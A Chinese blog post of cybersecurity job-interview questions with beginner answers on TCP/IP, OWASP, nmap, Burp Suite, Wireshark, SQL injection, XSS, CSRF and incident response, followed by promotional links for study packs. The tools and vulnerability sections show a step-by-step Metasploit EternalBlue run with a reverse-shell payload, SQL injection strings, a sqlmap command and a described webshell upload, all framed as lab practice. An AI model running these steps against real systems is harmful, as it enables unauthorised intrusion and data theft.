网络安全面试必过!0 基础也能答的面试高频题

网络安全面试必过!0 基础也能答的面试高频题

在这里插入图片描述

不管是面安全运维、初级渗透测试,还是应届生岗位,面试官翻来覆去就问这些题!我整理了近 3 个月 20 家企业的面试真题,按「入门必问→进阶重点→项目踩坑」分类,每道题都标了考察点和 “小白能说清” 的答案,帮你避开 “答不出”“答跑偏” 的坑。

一、基础理论类(必问!占比 30%)

这类题不考复杂技术,但能筛掉 “连门都没入” 的人,答案不用太深入,说清核心逻辑就行。

1. 什么是 TCP/IP 协议?它分几层?

面试官考察点:判断你是否懂网络基础(连网络都不懂,没法做安全)

小白答案:TCP/IP 是互联网的 “交通规则”,负责数据在电脑间传输。通常分 4 层:

  • 应用层(比如 HTTP、FTP,像快递的 “收件人信息”);

  • 传输层(TCP/UDP,负责把数据拆包 / 拼包,像快递分拣);

  • 网络层(IP 协议,确定数据传哪去,像快递的 “运输路线”);

  • 网络接口层(比如网卡,负责物理传输,像快递车)。

避坑:别记 7 层 OSI 模型!面试问 TCP/IP,说 4 层就行,小白记混反而扣分。

2. OWASP Top 10 是什么?2021 版里最常见的漏洞是啥?

面试官考察点:判断你是否了解行业通用标准(这是安全人的 “基础知识手册”)

小白答案:OWASP 是个安全组织,Top 10 就是它总结的 “最常见的 10 种 Web 漏洞”,2021 版里排第一的是 “注入漏洞”(比如 SQL 注入),还有跨站脚本(XSS)、失效的身份认证这些。

我记的时候会抓重点:比如注入漏洞就是黑客把恶意代码 “掺” 进正常请求里,让服务器执行;像输入框里输’ or 1=1–,可能就会绕过登录,这就是简单的 SQL 注入。

避坑:别说 “我记不全 10 个”,重点说清前 3 个(注入、XSS、失效认证),加个小例子,比记全更加分。

3. 什么是防火墙?它能防住所有攻击吗?

面试官考察点:判断你是否懂基础防护工具(安全运维岗必问)

小白答案:防火墙像网络的 “守门人”,按规则控制哪些数据能进、哪些能出。比如公司防火墙会禁止外部 IP 访问内部服务器的 22 端口(SSH),防止被远程登录。

但它防不住所有攻击:比如黑客用正常端口(像 80、443,浏览器用的端口)传恶意数据,防火墙可能识别不出来;还有内部员工误点钓鱼链接,防火墙也管不了。

加分项:提一句 “现在有下一代防火墙(NGFW),能识别应用层攻击,比传统的好一些”,显露出你了解新技术。

4. HTTP 和 HTTPS 的区别是什么?HTTPS 怎么保证安全?

面试官考察点:判断你是否懂 Web 通信安全(渗透测试、安全运维都问)

小白答案:最直观的是网址开头,HTTP 没锁,HTTPS 有小绿锁。核心区别是 HTTPS 多了 “SSL/TLS 加密”:

  • HTTP 传数据是 “明文”,比如你输的密码会直接发,黑客能截到;

  • HTTPS 会把数据加密成 “乱码”,只有服务器有钥匙能解开。

它保证安全靠 “证书”:比如百度的 HTTPS 证书是第三方机构发的,证明这个网站是真的,不是黑客仿的;同时传输过程中会用对称加密(快)+ 非对称加密(安全)结合的方式。

避坑:别只说 “HTTPS 更安全”,要讲清 “加密” 和 “证书” 这两个关键点。

二、工具实操类(核心!占比 40%)

面试官最烦 “只会背理论,不会用工具” 的人,这类题一定要结合 “具体操作” 说,哪怕是靶场经验也行。

1. 用 Nmap 做端口扫描,常用的命令有哪些?比如想扫 192.168.1.1 的常用端口。

面试官考察点:判断你是否会用基础扫描工具(渗透测试、运维必问)

小白答案:我常用的有 3 个命令,都是在 Kali Linux 里敲的:

  • 快速扫常用端口:nmap -F 192.168.1.1(-F 是 “快速模式”,只扫 100 个常用端口,比如 80、443、22,适合初步探测);

  • 扫全端口(1-65535):nmap -p- 192.168.1.1(加-v能看扫描过程,比如 “发现 80 端口开放”);

  • 看端口对应的服务:nmap -sV 192.168.1.1(比如能扫出 80 端口跑的是 Apache 2.4.49,知道服务版本才能找对应漏洞)。

我在 DVWA 靶场练过,扫出来 80 端口开放,就能接着用浏览器访问靶场了。

避坑:别只说命令,加个 “用在哪” 的场景,比如 “扫靶场端口”,证明你真用过。

2. Burp Suite 怎么抓包改包?比如想改一个登录请求的参数。

面试官考察点:判断你是否会用 Web 安全核心工具(渗透测试必问)

小白答案:首先得在浏览器里设代理(比如 Burp 默认是 127.0.0.1:8080),这样浏览器的请求会先过 Burp。

抓包改包分 3 步:

  1. 打开 Burp 的 “Proxy” 模块,点 “Intercept is on”(开启拦截);

  2. 在浏览器里输登录账号密码,点登录 —— 这时候请求会被 Burp 拦住,在 “Raw” 标签里能看到请求数据,比如username=test&password=123;

  3. 把password=123改成password=456,点 “Forward”(放行),服务器就会收到改过的请求。

我练 SQL 注入时,就用这个方法改请求里的参数,比如把id=1改成id=1’ or 1=1–,看服务器会不会返回所有数据。

加分项:提一句 “改完包后可以用‘Repeater’模块反复发请求,测试不同参数的效果”,显露出你会深入用工具。

3. Metasploit 怎么用?比如想利用 Windows 的永恒之蓝漏洞。

面试官考察点:判断你是否会用漏洞利用工具(渗透测试进阶题)

小白答案:Metasploit 是个漏洞利用框架,里面有很多现成的 “攻击模块”。用永恒之蓝的话,我在 Kali 里会这么操作:

  1. 先启动 msfconsole(打开框架);

  2. 搜永恒之蓝的模块:search eternalblue,会出来exploit/windows/smb/ms17_010_eternalblue;

  3. 加载模块:use exploit/windows/smb/ms17_010_eternalblue;

  4. 设目标 IP:set RHOSTS 192.168.1.10(靶机的 IP);

  5. 设攻击载荷(就是成功后要执行的命令):set PAYLOAD windows/x64/meterpreter/reverse_tcp(这个载荷能拿到靶机的远程控制权限);

  6. 设自己的 IP(让靶机连回来):set LHOST 192.168.1.20

  7. 最后运行:exploit,如果成功,就能用shell命令控制靶机了。

我在 VulnHub 的 Win7 靶机上练过,成功拿到过桌面控制权限。

避坑:别只说步骤,加 “靶机环境”,说明你是在合法环境里练的,不是乱扫真实网站。

4. 怎么用 Wireshark 抓 HTTP 包?怎么过滤出指定 IP 的流量?

面试官考察点:判断你是否会分析网络流量(安全运维、应急响应必问)

小白答案:Wireshark 是抓包工具,能看所有经过网卡的数据包。

抓 HTTP 包步骤:

  1. 打开 Wireshark,选要抓包的网卡(比如 Wi-Fi 的网卡);

  2. 直接点 “开始”,就能看到所有流量;

  3. 要过滤 HTTP 包,在上面的过滤框里输 “http”,就能只显示 HTTP 的请求和响应(比如能看到浏览器向百度发的 GET 请求)。

如果想过滤指定 IP 的流量,比如只看 192.168.1.10 的包,过滤框里输 “ip.addr == 192.168.1.10”;如果想看出向 192.168.1.10 的包,输 “ip.dst == 192.168.1.10”。

我之前排查 “网页加载慢” 的问题,就用 Wireshark 抓包,发现是某个 IP 的响应时间太长,后来把那个 IP 加入防火墙白名单就好了。

三、漏洞原理类(进阶!占比 20%)

这类题要讲清 “是什么 + 怎么来的 + 怎么防”,不用太深入底层,但逻辑要通。

1. 什么是 SQL 注入?怎么检测?怎么防御?

面试官考察点:判断你是否懂最常见的 Web 漏洞(所有安全岗必问)

小白答案:SQL 注入就是黑客把 SQL 语句 “掺” 进用户输入里,让服务器误执行。比如登录页面的用户名输入框,正常输 “test”,服务器会执行select * from user where username=‘test’;如果黑客输test’ or 1=1–,服务器就会执行select * from user where username=‘test’ or 1=1–',“or 1=1” 永远为真,就能绕过登录。

检测方法:我常用两种 ——

  1. 手动测:在输入框里输’,如果服务器返回报错(比如 “SQL syntax error”),说明可能有注入点;

  2. 工具测:用 Burp 的 “Active Scan” 扫,或者用 SQLMap(命令比如sqlmap -u “http://test.com/login.php?username=test”),能自动检测是否有注入,还能提权。

防御方法:核心是 “过滤用户输入”,比如:

  1. 用参数化查询( PreparedStatement ),让用户输入的内容只能当 “数据”,不能当 SQL 命令;

  2. 给数据库账号降权,比如查询用的账号不让删表、改数据;

  3. 用 WAF(Web 应用防火墙),自动拦截注入语句。

2. 什么是 XSS 攻击?分哪几种?怎么防?

面试官考察点:判断你是否懂前端安全漏洞(渗透测试、Web 安全岗必问)

小白答案:XSS 就是黑客把恶意 JS 代码 “插” 进网页里,让其他用户访问时执行。比如论坛评论区,黑客发一条带的评论,如果网站没过滤,其他用户看评论时就会弹出弹窗,严重的话会被偷 Cookie(登录信息)。

分 3 种:

  1. 存储型 XSS:恶意代码存在服务器里(比如评论、数据库),所有人看都触发(最危险,比如论坛评论);

  2. 反射型 XSS:恶意代码在 URL 里(比如http://test.com/search.php?key=%3Cscript%3E…%3C/script%3E),只有点链接的人触发(比如钓鱼链接);

  3. DOM 型 XSS:恶意代码通过操作页面 DOM 触发(比如 JS 里用document.write(location.href),没过滤 URL 参数),不经过服务器。

防御方法:

  1. 转义特殊字符:比如把<改成<,>改成>,让 JS 代码变成普通文字;

  2. 用 CSP(内容安全策略):在 HTTP 头里设Content-Security-Policy: default-src ‘self’,限制只能加载自己域名的资源,不让加载恶意 JS;

  3. 给 Cookie 加HttpOnly属性,让 JS 拿不到 Cookie,就算有 XSS 也偷不了登录信息。

3. 什么是 CSRF 攻击?和 XSS 有啥区别?怎么防?

面试官考察点:判断你是否能区分相似漏洞(进阶岗必问)

小白答案:CSRF 是 “跨站请求伪造”,比如黑客骗你点一个链接,这个链接会自动向你已登录的网站发请求(比如转账、改密码),因为你登录过,网站认你的 Cookie,就会执行这个请求。

举个例子:你登录了某银行网站(Cookie 还在),然后点了黑客发的链接http://bank.com/transfer?to=黑客账号&money=1000,如果银行没防 CSRF,就会自动转钱。

和 XSS 的区别:XSS 是黑客往网页里插 “恶意代码”,让用户执行;CSRF 是黑客 “骗用户发请求”,利用用户的登录状态做事,不需要插代码。

防御方法:

  1. 加 CSRF Token:网站给每个表单加一个随机字符串(Token),提交时要带这个 Token,黑客不知道 Token,就发不了有效请求;

  2. 检查 Referer 头:判断请求是不是从自己网站发的(比如 Referer 是http://bank.com才允许,黑客的链接 Referer 是别的域名);

  3. 重要操作要二次验证(比如转账输验证码)。

四、项目 / 经验类(定薪关键!占比 10%)

小白没真实项目也别怕,说靶场经验、练手案例就行,重点讲 “你做了什么 + 遇到什么问题 + 怎么解决的”。

1. 你有没有做过漏洞挖掘 / 渗透测试的项目?具体说下流程。

面试官考察点:判断你是否有实战能力(没经验会减分,但说清靶场经验能补救)

小白答案:我虽然没企业项目经验,但在 Hack The Box 和 DVWA 靶场做过完整的渗透测试,流程和实际项目差不多,比如 DVWA 靶场的测试:

  1. 信息收集:用 Nmap 扫出靶机 IP 是 192.168.1.10,80 端口开放,跑的是 Apache 服务;用 Burp 抓包看是 PHP 网站,DVWA 版本是 1.10;

  2. 漏洞扫描:用 Burp Active Scan 扫,发现登录页有 SQL 注入,评论区有 XSS;

  3. 漏洞利用:

  • SQL 注入:用 SQLMap 跑,拿到数据库里的用户表,有 admin 的密码哈希,用 John the Ripper 破解出密码是 “password”;

  • XSS:在评论区发,成功拿到其他用户的 Cookie;

  1. 提权:登录后台后,发现有文件上传功能,上传了一个带马的 PHP 文件(用蚁剑连接),拿到服务器的 www-data 权限;

  2. 报告输出:整理了 2 个漏洞的详细步骤、截图,还有修复建议(比如用参数化查询防注入,转义字符防 XSS)。

我还在漏洞盒子平台提交过一个小漏洞(某企业官网的反射型 XSS),虽然没拿奖金,但学会了怎么写规范的漏洞报告。

避坑:别瞎编企业项目!说靶场 + 公益漏洞平台经验,比编的真实,面试官更认。

2. 如果你发现服务器被入侵了,怎么应急响应?

面试官考察点:判断你是否有解决问题的思路(安全运维、应急响应岗必问)

小白答案:我会按 “止损→查原因→修复→总结” 四步来:

  1. 先止损:比如服务器有异常进程,先 kill 掉;如果是 Web 入侵,先把网站临时下线,或者用防火墙阻断异常 IP;如果数据被删,先断开服务器的网络,防止进一步破坏;

  2. 查原因:

  • 看日志:/var/log/auth.log(Linux 登录日志),看有没有陌生 IP 登录;/var/log/apache2/access.log(Web 日志),看有没有异常请求(比如带注入语句的);

  • 找后门:用 find 命令找最近修改的文件(find / -mtime -1,找 1 天内改的文件),看有没有陌生的 PHP 马、Shell 脚本;

  • 查进程:用 ps -aux 看有没有异常进程(比如名字奇怪、CPU 占用高的);

  1. 修复:删除后门文件,改所有账号的密码(尤其是 root、管理员账号),补漏洞(比如服务器有永恒之蓝漏洞,就装补丁),如果数据丢了,用备份恢复;

  2. 总结:写应急报告,记清楚入侵时间、原因、损失、修复步骤,下次针对性加固(比如开启日志审计,定期扫漏洞)。

我在 VMware 里模拟过 “服务器被植入木马” 的场景,用这个流程成功找到木马文件(/tmp/backdoor.sh),并修复了。

如果你是也准备转行学习网络安全(黑客)或者正在学习,这些我购买的资源可以分享给你们,互勉:

①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包,需要点击下方链接即可前往获取

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程文末领取哈)
在这里插入图片描述

在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

在这里插入图片描述

黑客资料由于是敏感资源,这里不能直接展示哦!(全套教程文末领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值